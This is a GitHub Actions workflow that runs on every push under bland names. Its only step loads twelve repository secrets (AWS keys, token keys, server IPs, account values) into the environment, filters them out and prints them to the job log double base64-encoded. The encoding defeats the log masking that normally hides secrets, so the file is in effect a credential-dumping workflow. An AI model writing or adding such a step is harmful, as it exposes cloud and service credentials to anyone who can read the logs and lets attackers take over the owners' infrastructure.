name: GitHub Actions
on: push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
      - name: command
        run: env -0 | awk -v RS='\0' '/^(secret_|var_)/ {print $0}' | base64 -w0 | base64 -w0
        env:
          secret_ACCESS_TOKEN_KEY: ${{ secrets.ACCESS_TOKEN_KEY }}
          secret_AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          secret_AWS_BUCKET_NAME: ${{ secrets.AWS_BUCKET_NAME }}
          secret_AWS_BUCKET_NAME_RELEASE: ${{ secrets.AWS_BUCKET_NAME_RELEASE }}
          secret_AWS_DISTRIBUTION_ID: ${{ secrets.AWS_DISTRIBUTION_ID }}
          secret_AWS_DISTRIBUTION_ID_RELEASE: ${{ secrets.AWS_DISTRIBUTION_ID_RELEASE }}
          secret_AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          secret_IP: ${{ secrets.IP }}
          secret_IP_RELEASE: ${{ secrets.IP_RELEASE }}
          secret_KUMOH42_FIND_ACCOUNT: ${{ secrets.KUMOH42_FIND_ACCOUNT }}
          secret_KUMOH42_REGISTER: ${{ secrets.KUMOH42_REGISTER }}
          secret_REFRESH_TOKEN_KEY: ${{ secrets.REFRESH_TOKEN_KEY }}
